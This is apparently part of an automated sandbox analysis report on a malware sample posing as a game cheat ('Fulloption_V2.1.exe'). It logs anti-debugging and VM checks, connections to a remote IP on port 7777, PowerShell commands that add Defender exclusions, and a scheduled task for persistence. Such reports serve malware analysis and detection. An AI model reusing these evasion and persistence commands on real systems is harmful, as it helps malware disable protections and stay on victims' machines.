                        Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 4342Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5068Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6062Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3646Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6306Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3337Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6747
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2948
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exe TID: 2248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 5224Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep count: 6062 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep count: 3646 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 6747 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 2948 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\ProgramData\svchost.exe TID: 5256Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\ProgramData\svchost.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\ProgramData\svchost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\svchost.exeThread delayed: delay time: 922337203685477
                        Source: svchost.exe, 00000003.00000002.3403575699.000000001D200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSer
                        Source: svchost.exe.0.drBinary or memory string: vmware
                        Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.drBinary or memory string: \\.\VBoxMiniRdrDN
                        Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.drBinary or memory string: VBoxHook.dll
                        Source: FullOption_2.1Xenos.exe.0.drBinary or memory string: Bet\SBAGGY2\SBAGGY\examples\backends\imgui_impl_win32.cppio.BackendPlatformUserData == nullptr && "Already initialized a platform backend!"imgui_impl_win32xinput1_4.dllxinput1_3.dllxinput9_1_0.dllxinput1_2.dllxinput1_1.dllXInputGetCapabilitiesXInputGetStatebd != nullptr && "No platform backend to shutdown, or already shutdown?"bd->hWnd != 0bd != nullptr && "Did you call ImGui_ImplWin32_Init()?" NtSetInformationThreadntdll.dll*VMWARE**VBOX**VIRTUAL*SYSTEM\ControlSet001\Services\Disk\EnumSbieDll.dllVBoxHook.dll\\.\VBoxMiniRdrDNOllyDbg - [CPU]OllyDbgImmunity Debugger - [CPU]x64dbgHTTP DebuggerCheat user 7.4The Wireshark Network AnalyzerProgress Telerik Fiddler ClassicCharles 4.6.2 - Session 1 *Charles 4.6.2 - Session 2 *Charles 4.6.2 - Session 3 *Scylla x64 v0.9.8Scylla x86 v0.9.8x64dbg[Elevated]cheatuser-x86_64.exeollydbg.exeida.exeida64.exeradare2.exex64dbg.execheatuser-x86_64-SSE4-AVX2OLLYDBG.EXECharles.exeWireshark.exeHTTPDebuggerUI.exeKsDumperClient.exeProcessHacker.exeScylla_x86Scylla_x64It is impossible to check process list.OLLYDBGIDXTPMainFrameSunAwtFrameWinListerMainProcessHackerNtQueryInformationProcess%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s: genericsystembad castinvalid stof argumentstof argument out of rangeLoaded!
                        Source: Fulloption_V2.1.exe, 00000000.00000002.2151148890.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                        Source: FullOption_2.1Xenos.exe.0.drBinary or memory string: *VMWARE*
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 3_2_00007FFD34887A81 CheckRemoteDebuggerPresent,3_2_00007FFD34887A81
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE82DF58 GetLastError,IsDebuggerPresent,OutputDebugStringW,2_2_00007FF6AE82DF58
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE82DF58 GetLastError,IsDebuggerPresent,OutputDebugStringW,2_2_00007FF6AE82DF58
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeCode function: 2_2_00007FF6AE6D2400 GetProcessHeap,2_2_00007FF6AE6D2400
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\ProgramData\svchost.exeProcess token adjusted: Debug
                        Source: C:\ProgramData\svchost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.27.248 7777Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Fulloption_V2.1.exeQueries volume information: C:\Users\user\Desktop\Fulloption_V2.1.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
